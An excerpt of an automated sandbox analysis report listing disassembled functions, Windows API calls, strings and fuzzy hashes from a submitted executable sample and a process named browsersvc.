                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: File$Create$CloseHandleTime
                  • String ID:
                  • API String ID: 2287278272-0
                  • Opcode ID: ed310521e33f2028c5c3ceb693cde28e652e48c8c1cd2f65025725a032495698
                  • Instruction ID: 74a57e6a57003c9edd88b64b4e2907bea2fd9c16130a812d59f842c540db6689
                  • Opcode Fuzzy Hash: ed310521e33f2028c5c3ceb693cde28e652e48c8c1cd2f65025725a032495698
                  • Instruction Fuzzy Hash: 0C41FFB12483896AE731DF64DC45FFEBBE8AB81300F04091DB6D8D71D0D6A89A48DB13
                  Function 00A1C099 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00A189AD,?,00000000,?,00000001,?,?,00000001,00A189AD,?), ref: 00A1C0E6
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A1C16F
                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00A167E2,?), ref: 00A1C181
                  • __freea.LIBCMT ref: 00A1C18A
                    • Part of subcall function 00A18518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A1C13D,00000000,?,00A167E2,?,00000008,?,00A189AD,?,?,?), ref: 00A1854A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                  • String ID:
                  • API String ID: 2652629310-0
                  • Opcode ID: b6783cbd3949d03695b135efe161edb79d96c635fb31ea55c8838bbb4d7c89f8
                  • Instruction ID: a0be6a4024bb785052a92f0f1ce01dedb384b5d028073cc06ac79cd187428c3b
                  • Opcode Fuzzy Hash: b6783cbd3949d03695b135efe161edb79d96c635fb31ea55c8838bbb4d7c89f8
                  • Instruction Fuzzy Hash: EB31CF72A4021AABDF25CFA8DC45DEE7BA5EB44720F140228FC05D7291EB35CD91CBA0
                  Function 00A12503 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • ___BuildCatchObject.LIBVCRUNTIME ref: 00A1251A
                    • Part of subcall function 00A12B52: ___AdjustPointer.LIBCMT ref: 00A12B9C
                  • _UnwindNestedFrames.LIBCMT ref: 00A12531
                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 00A12543
                  • CallCatchBlock.LIBVCRUNTIME ref: 00A12567
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                  • String ID:
                  • API String ID: 2633735394-0
                  • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                  • Instruction ID: 4c9b9e62c25284df2b047f70112c6cfc9e0e313a81f33c79a33b865c26e99f7e
                  • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                  • Instruction Fuzzy Hash: 7B012532000108BFCF229F65DD41EDA3BBAEF58760F058014FD1866120D336E9B1EBA1
                  Function 00A09DBB Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                  Download Yara Rule
                  APIs
                  • GetDC.USER32(00000000), ref: 00A09DBE
                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00A09DCD
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A09DDB
                  • ReleaseDC.USER32(00000000,00000000), ref: 00A09DE9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: CapsDevice$Release
                  • String ID:
                  • API String ID: 1035833867-0
                  • Opcode ID: 429808d65a517c12346341b45e79174174617ff1eccd21d07d2ff6c5801b5907
                  • Instruction ID: 5abf5762fc45fe2bb6d294e4d1f1e41952d08457d002954879f46c976b3282e7
                  • Opcode Fuzzy Hash: 429808d65a517c12346341b45e79174174617ff1eccd21d07d2ff6c5801b5907
                  • Instruction Fuzzy Hash: C5E0EC31A86721A7D3609BE4BC0DB8B3B64BB1A713F050005F605961D0DA744846CB90
                  Function 00A12016 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                  Download Yara Rule
                  APIs
                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00A12016
                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00A1201B
                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00A12020
                    • Part of subcall function 00A1310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00A1311F
                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00A12035
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                  • String ID:
                  • API String ID: 1761009282-0
                  • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                  • Instruction ID: e92459abba3f443bc0bf3ec36876c1738101355487d5b5d9c43d82a9a924420e
                  • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                  • Instruction Fuzzy Hash: 0EC00226004640A41C217EB223023E9070408667C5B9223C2A890171039E068AEAA33A
                  Function 00A09F5D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00A09DF1: GetDC.USER32(00000000), ref: 00A09DF5
                    • Part of subcall function 00A09DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A09E00
                    • Part of subcall function 00A09DF1: ReleaseDC.USER32(00000000,00000000), ref: 00A09E0B
                  • GetObjectW.GDI32(?,00000018,?), ref: 00A09F8D
                    • Part of subcall function 00A0A1E5: GetDC.USER32(00000000), ref: 00A0A1EE
                    • Part of subcall function 00A0A1E5: GetObjectW.GDI32(?,00000018,?), ref: 00A0A21D
                    • Part of subcall function 00A0A1E5: ReleaseDC.USER32(00000000,?), ref: 00A0A2B5
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ObjectRelease$CapsDevice
                  • String ID: (
                  • API String ID: 1061551593-3887548279
                  • Opcode ID: 80550c7e582ce7b732607962b0058670ac13a7b2ee158f45816a70102db4eb16
                  • Instruction ID: 5f5b6ebdb995777536e903de09ac0367abaec98214adb00ac91753833beb7790
                  • Opcode Fuzzy Hash: 80550c7e582ce7b732607962b0058670ac13a7b2ee158f45816a70102db4eb16
                  • Instruction Fuzzy Hash: E9811671608318DFC614DF69D844A6ABBE9FF99704F00492DF986D72A0CB35AD06CB52
                  Function 00A00E37 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: _swprintf
                  • String ID: %ls$%s: %s
                  • API String ID: 589789837-2259941744
                  • Opcode ID: e375cd32eedf0555892a63af3e36a27cc26f980c9ed1f9fecfc99034b7639475
                  • Instruction ID: 3ce1fc1c7be0e0412f5b157850ca31b03570d26d5be1a79bc6b4ec98a779d31b
                  • Opcode Fuzzy Hash: e375cd32eedf0555892a63af3e36a27cc26f980c9ed1f9fecfc99034b7639475
                  • Instruction Fuzzy Hash: 5D51C73128C70DFAEB211AA4FD42F767A76AB05B00F204916F3DB748D1C6A26550B713
                  Function 009F772B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 009F7730
                  • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 009F78CC
                    • Part of subcall function 009FA444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,009FA27A,?,?,?,009FA113,?,00000001,00000000,?,?), ref: 009FA458
                    • Part of subcall function 009FA444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,009FA27A,?,?,?,009FA113,?,00000001,00000000,?,?), ref: 009FA489
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: File$Attributes$H_prologTime
                  • String ID: :
                  • API String ID: 1861295151-336475711
                  • Opcode ID: 2b82f63e47c9f3f07019e9df08be8b66a29324431a3f3102aa4d7675399052b9
                  • Instruction ID: ec5456b68dec98191185db7350d3025827bd9e27aa3dba4f2545f657477ef7d9
                  • Opcode Fuzzy Hash: 2b82f63e47c9f3f07019e9df08be8b66a29324431a3f3102aa4d7675399052b9
                  • Instruction Fuzzy Hash: 9C414F7190526CAADB25EB90DD59FFEB37CAF85340F0040AAB709A2092DB745F84DF61
                  Function 009FB66C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID:
                  • String ID: UNC$\\?\
                  • API String ID: 0-253988292
                  • Opcode ID: 4b997ce78861c54bce76da8e46e87d0079b744db288f6dedb1c222b2dabc138a
                  • Instruction ID: 861bbfb8fb93b718ccb15028cd81ecd0f7a44040090497c4f771a675d580e27d
                  • Opcode Fuzzy Hash: 4b997ce78861c54bce76da8e46e87d0079b744db288f6dedb1c222b2dabc138a
                  • Instruction Fuzzy Hash: CF418B3680022DBACF20BF21DC41EFB77ADAF85790B144425FB54A7552E774EA90CBA0
                  Function 00A08FB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID:
                  • String ID: Shell.Explorer$about:blank
                  • API String ID: 0-874089819
                  • Opcode ID: dea5e1813542d49363af133136716eb5c812003229e3fce69b6ffe32d59db5e8
                  • Instruction ID: d8866469209198d81087ae28ce94785b27f3e8118a5a8e2b7ed889cb46044801
                  • Opcode Fuzzy Hash: dea5e1813542d49363af133136716eb5c812003229e3fce69b6ffe32d59db5e8
                  • Instruction Fuzzy Hash: 7F21A2717043189FCB18EF68E895A2B77A9FF88311B14856DF8498B2C2DB70EC01CB60
                  Function 009FEBF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009FEB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 009FEB92
                    • Part of subcall function 009FEB73: GetProcAddress.KERNEL32(00A381C0,CryptUnprotectMemory), ref: 009FEBA2
                  • GetCurrentProcessId.KERNEL32(?,?,?,009FEBEC), ref: 009FEC84
                  Strings
                  • CryptProtectMemory failed, xrefs: 009FEC3B
                  • CryptUnprotectMemory failed, xrefs: 009FEC7C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AddressProc$CurrentProcess
                  • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                  • API String ID: 2190909847-396321323
                  • Opcode ID: 34e4abe18e12134e92f75fcc0a25b0e5e9cb7b31a321f281147f3e0ff09a83b0
                  • Instruction ID: ee2f157f6864e8fcc6ff570a1753129d85ec11a4eeacdbb90d2b1e70f505faf1
                  • Opcode Fuzzy Hash: 34e4abe18e12134e92f75fcc0a25b0e5e9cb7b31a321f281147f3e0ff09a83b0
                  • Instruction Fuzzy Hash: 9A112932A0532CABDB259B35DD06A7E3718AF45B20B044125FE856B2A1CB799E4287D4
                  Function 00A00889 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                  Download Yara Rule
                  APIs
                  • CreateThread.KERNEL32(00000000,00010000,00A009D0,?,00000000,00000000), ref: 00A008AD
                  • SetThreadPriority.KERNEL32(?,00000000), ref: 00A008F4
                    • Part of subcall function 009F6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009F6EAF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Thread$CreatePriority__vswprintf_c_l
                  • String ID: CreateThread failed
                  • API String ID: 2655393344-3849766595
                  • Opcode ID: 638905f698b0f9436871b4366eb4e70c493ed1711159ec0bdf09275433cee528
                  • Instruction ID: e659eb1eb2f27c63189c7b3b01f5fa9e51953ebd71d985bea0378d0e1eb46b7b
                  • Opcode Fuzzy Hash: 638905f698b0f9436871b4366eb4e70c493ed1711159ec0bdf09275433cee528
                  • Instruction Fuzzy Hash: 1101D6B23443096FD634AF64FD81F767398FB45711F10053DF686921C0CAA1A8459764
                  Function 009F130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009FDA98: _swprintf.LIBCMT ref: 009FDABE
                    • Part of subcall function 009FDA98: _strlen.LIBCMT ref: 009FDADF
                    • Part of subcall function 009FDA98: SetDlgItemTextW.USER32(?,00A2E154,?), ref: 009FDB3F
                    • Part of subcall function 009FDA98: GetWindowRect.USER32(?,?), ref: 009FDB79
                    • Part of subcall function 009FDA98: GetClientRect.USER32(?,?), ref: 009FDB85
                  • GetDlgItem.USER32(00000000,00003021), ref: 009F134F
                  • SetWindowTextW.USER32(00000000,00A235B4), ref: 009F1365
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ItemRectTextWindow$Client_strlen_swprintf
                  • String ID: 0
                  • API String ID: 2622349952-4108050209
                  • Opcode ID: cae2b2381c46bd0d404b4f85e421dca56ea48bf864b184f0a47426ac934a7590
                  • Instruction ID: 52d8b0b7832cebde3a4d35c45412055d7943f9e0e89d8efc0869efb33d9dde17
                  • Opcode Fuzzy Hash: cae2b2381c46bd0d404b4f85e421dca56ea48bf864b184f0a47426ac934a7590
                  • Instruction Fuzzy Hash: A3F0AF3020834CEBDF254F608C09BFA3B9DBB21306F088414FF59549A1D7B8C995EB90
                  Function 00A0084E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                  Download Yara Rule
                  APIs
                  • WaitForSingleObject.KERNEL32(?,000000FF,00A00A78,?), ref: 00A00854
                  • GetLastError.KERNEL32(?), ref: 00A00860
                    • Part of subcall function 009F6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009F6EAF
                  Strings
                  • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00A00869
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                  • String ID: WaitForMultipleObjects error %d, GetLastError %d
                  • API String ID: 1091760877-2248577382
                  • Opcode ID: f77bb30de9a357a349d375caa92cd23b43975d182e5351538ce107ebc3b4c9ce
                  • Instruction ID: fe910522ff33843e2b33f80401f6c478817d6129da2b43b9bc11ff69e0c9abae
                  • Opcode Fuzzy Hash: f77bb30de9a357a349d375caa92cd23b43975d182e5351538ce107ebc3b4c9ce
                  • Instruction Fuzzy Hash: 9DD05E33A0C13077CA202768BC0AFBF7915AF93730F204724F239A51F5DA25096287E5
                  Function 009FDA4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleW.KERNEL32(00000000,?,009FD32F,?), ref: 009FDA53
                  • FindResourceW.KERNEL32(00000000,RTL,00000005,?,009FD32F,?), ref: 009FDA61
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: FindHandleModuleResource
                  • String ID: RTL
                  • API String ID: 3537982541-834975271
                  • Opcode ID: 5f9befad9ae2d6cb2493fc190436ca9851f21e2865c8f10ebf920f7cd2c9ab32
                  • Instruction ID: 80796ff19a4ea3d8cd906ded1c5bb6ddc4a715785fe7f07069f0ede60d5b167b
                  • Opcode Fuzzy Hash: 5f9befad9ae2d6cb2493fc190436ca9851f21e2865c8f10ebf920f7cd2c9ab32
                  • Instruction Fuzzy Hash: 44C0123338935076DF3057787C0DB6329486B12B11F05056CB241DA5D0D5E9C9428760

                  Executed Functions

                  Function 00007FFD9BAB3555 Relevance: 1.5, Strings: 1, Instructions: 298COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID: M_H
                  • API String ID: 0-372873180
                  • Opcode ID: dc91ae4208b8d2d06eb2abeb543472126bf2ad1a90a61062593704798eb39262
                  • Instruction ID: ad77c69687697a817816b42cff0275a647175bd303e36ba2d73f1897e1aa3116
                  • Opcode Fuzzy Hash: dc91ae4208b8d2d06eb2abeb543472126bf2ad1a90a61062593704798eb39262
                  • Instruction Fuzzy Hash: DEA1C172A1994E8FEB58DB68C8697AC7BE1FF59314F5002BED01DD72D6DEB428018B40
